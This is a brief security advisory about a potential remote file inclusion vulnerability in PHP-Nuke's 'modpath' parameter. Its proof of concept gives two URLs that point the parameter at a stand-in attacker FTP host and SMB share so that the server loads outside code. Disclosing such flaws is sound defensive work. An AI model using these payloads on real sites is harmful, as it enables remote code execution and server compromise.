PHP-Nuke Modpath Parameter Potential File Include Vulnerability

PHP-Nuke Modpath Parameter Potential File Include Vulnerability

There is no exploit required.

The following proof of concept is available:
http://www.example.com/nuke73/index.php?modpath=ftp://attacker.com/directory/
http://www.example.com/nuke73/index.php?modpath=//attacker_ip/share_name/